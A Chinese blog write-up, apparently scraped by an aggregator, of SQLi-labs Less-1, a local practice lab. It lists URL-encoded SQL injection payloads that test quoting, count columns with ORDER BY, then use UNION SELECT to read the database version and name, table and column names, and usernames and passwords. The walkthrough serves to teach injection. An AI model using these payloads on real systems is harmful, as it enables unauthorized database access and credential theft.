2. 程式人生 > >SQLI DUMB SERIES-1

SQLI DUMB SERIES-1

阿新 發佈:2019-03-01
失敗 word database on() 過濾 多少 version 可見 size

less-1

(1)

技術分享圖片

可以看到提示輸入ID,而且less-1題目也有提到GET,因此試試以下操作:

http://127.0.0.1/sqli-labs-master/Less-1/?id=1

結果:

技術分享圖片

http://127.0.0.1/sqli-labs-master/Less-1/?id=1%27

結果:

技術分享圖片

  現在可知,“ ‘ ”並沒有被過濾,因此可以進行以下操作:

http://127.0.0.1/sqli-labs-master/Less-1/?id=1%27%20and%201=1%23

結果:回顯正常

技術分享圖片

http://127.0.0.1/sqli-labs-master/Less-1/?id=1%27%20and%201=2%23

結果:回顯失敗

技術分享圖片

由此可見,此處存在註入點,可通過上述方式獲取所有Id的name以及password。

(2)用order by 判斷列數(%20表示空格,%27表示 ‘ ,%23表示#)

http://127.0.0.1/sqli-labs-master/Less-1/?id=1%27%20order%20by%203%23

技術分享圖片

http://127.0.0.1/sqli-labs-master/Less-1/?id=1%27%20order%20by%204%23

技術分享圖片

  由此可見第3欄位存在,而第四欄位不存在,該表只有3列。

(3)聯合查詢註入

http://127.0.0.1/sqli-labs-master/Less-1/?id=-1%27%20union%20select%201,2,3%23

技術分享圖片

回顯字段2和3

http://127.0.0.1/sqli-labs-master/Less-1/?id=-1%27%20union%20select%201,version(),database()%23

技術分享圖片

由上圖可知,php版本是5.5.53,數據庫名字是security。

(4)爆表:列出數據庫所有表

http://127.0.0.1/sqli-labs-master/Less-1/?id=-1%27%20union%20select%201,group_concat(table_name),
3%20from%20information_schema.tables%20where%20table_schema%20=%20%27security%27%20%23

技術分享圖片

四個表的name如上圖。

(5)爆列名

查看User表中的列名。

http://127.0.0.1/sqli-labs-master/Less-1/?id=-1%27%20union%20select%201,%20group_concat(column_name),3%20from%20information_schema.columns%20where%20table_name%20=%20%27users%27%20%23

技術分享圖片

也可查看表emails的列名

技術分享圖片

(5)查看表users有多少行

http://127.0.0.1/sqli-labs-master/Less-1/?id=-1%27%20union%20select%201,%20username,password%20from%20users%20where%20id=12%23

技術分享圖片

當id達到14時,無回顯,證明最多只有14列

SQLI DUMB SERIES-1

相關推薦

SQLI DUMB SERIES-1

失敗 word database on() 過濾 多少 version 可見 size less-1 (1) 可以看到提示輸入ID,而且less-1題目也有提到GET,因此試試以下操作: http://127.0.0.1/sqli-labs-master/Le

SQLI DUMB SERIES-4

技術分享 分享 其他 concat sqli tab nbsp union ESS less4 輸入單引號發現回顯正常,說明單引號被過濾了,輸入雙引號: ?id=1" 說明輸入的Id被一對雙引號和圓括號包圍,因此閉合雙引號和圓括號就行,其他方法跟les

SQLI DUMB SERIES-6

ima png 因此 info class div 分享圖片 nbsp true less6 輸入 ?id=1" 說明雙引號未被過濾,輸入的id被一對雙引號所包圍,存在註入點,可以閉合雙引號。 而輸入正常時 情況和less5相同,因此註入

SQLI DUMB SERIES-9

輸入 div php mit column pass col clas user (1)無論輸入啥,都回顯相同 (2)第五關、第八關以及這關都是使用盲註,除了第五關說的雙註入外,也可使用時間註入法。 ?id=1‘ and sleep(3) --+ 發

湖南大學ACM程序設計新生杯大賽(同步賽)I - Piglet treasure hunt Series 1

-i tell left subject void app upper ear mat 題目描述 Once there was a pig, which was very fond of treasure hunting. The treasure hunt is

Sqli-lab Less-1

得到 order by users pos format ima name tab 圖片 Less-1 輸入查詢語句?id=1後頁面返回為: 先簡單判斷一下該頁面有無註入點: 在後面加一個單引號後,頁面返回如下信息: 通過這個頁面我們可以知道至少兩個信息:一、我們構

sqli-lab教程——1-35通關Writeup

剛做sqli-lab的時候,我逛了幾個部落格論壇沒找到什麼特別完整的教程,在這裡寫一篇更完整的教程。有關sql注入的基礎知識請檢視我的另外一篇部落格,sql注入基礎知識(還沒寫出來)   本教程中使用到的函式if() left() extractvalue() group_conc

sqli-labs—————Less-1(字元型注入)

前言從這一篇文章開始,我們將開始真正的講解Sqli-libs中的各種注入,從第1階層開始,後續的內容會陸續放出,歡迎各位大佬的關注與評論!Less-1首先,開啟主頁進入第一關:可以看到提示,提示我們要傳入一個引數,名為ID,而且是資料型別,那麼我就傳入該引數看看到這裡,我們可

sqli-labs less 1 (基於錯誤的GET單引號字元型注入)

基礎知識: 常用url編碼:空格%20,單引號%27,雙引號%22,#號%23 mysql常用註釋符:#...  ,--空格...  ,/*...*/,--+(某些情況+可以代替空格,+瀏覽器會編碼成空格) 常用工具:火狐的hackbar concat函式:連線一個或

SQLI-LABS(Part 1)——搭建

搭建SQLI—LABS環境: 2.將原始碼放在web目錄下 Mac下web專案根目錄預設在/Library/WebServer/Documents Linux下web專案根目錄預設在/var/www/ 在這裡使用的為Ma

3.1.7. Cross validation of time series data

distrib per ted sklearn provided imp depend util ech 3.1.7. Cross validation of time series data Time series data is characterised by the

pandas Series KeyError: -1

start pac sed except call hide cti con img 前幾天寫分析方法,遇到的一個錯誤: 具體我已經在stackoverflow 裏面得到了詳細的解答,下面我把問題和解決辦法總結一下,方便日後的回顧 問題: sql = "selec

Sqli labs系列-less-1 詳細篇

失敗 環境 活躍 link 攻擊 master dbd href and 要說 SQL 註入學習,網上眾多的靶場,就屬 Sqli labs 這個系列挺不錯的,關卡達到60多關了,我自己也就打了不幾關,一個挺不錯的練習SQL註入的源碼。 我一開始就準備等我一些原理篇總結完了,

sqli-labs】 less54 GET -Challenge -Union -10 queries allowed -Variation1 (GET型 挑戰 聯合查詢 只允許10次查詢 變化1)

nbsp log 聯合 sql tables 圖片 post group spa 嘗試的次數只有10次 http://192.168.136.128/sqli-labs-master/Less-54/index.php?id=1‘ 單引號報錯,錯誤信息沒有顯示 加

sqli-labs】 less58 GET -Challenge -Double Query -5 queries allowed -Variation1 (GET型 挑戰 雙查詢 只允許5次查詢 變化1)

png sel labs 取數 技術分享 group less info union 單引號閉合成功,但是union select結果不對 http://192.168.136.128/sqli-labs-master/Less-58/?id=0‘ union sele

【Django Series - 01】以前用 1.6.11,最近用 1.10.8,現在又想換最新版本 2.1.2(探索中...)

Django Series(Django2.1.2 + Anaconda3) (一)安裝並配置 Django 環境 ||| 基於 Django 進行 Web 開發 (二)Django 基礎知識:語法、教程 (三)使用者管理模組:建立使用者、登入、退出 (四)資料的增刪改:使用者提交資

sqli-labs 1-20實驗記錄

1. less1 首先輸入?id=1 查詢是否有注入點.   輸入單引號 回顯報錯 說明有注入漏洞 而且是數字型   輸入 1’ or 1=1 order by 1 猜測列名# 這裡發現#不能變成url編碼 查一下 應該是%23 http://localh

sqli-labs 1-4通關筆記

background Mysql 有一個系統資料庫information_schema,儲存著所有的資料庫的相關資訊,一般的, 我們利用該表可以進行一次完整的注入。以下為一般的流程。 例項 select table_name from information_s

feedback in Physical Therapy (Article 1 in series)

Some of us may have undergone or are generally aware of the practice of physical therapy (also known as Physiotherapy). A general description goes as follo

Angular Routing Series: Pillar 1

Router StatesThe result of successfully matching a URL is that some set of components will be routed to, and rendered on screen through the use of router-o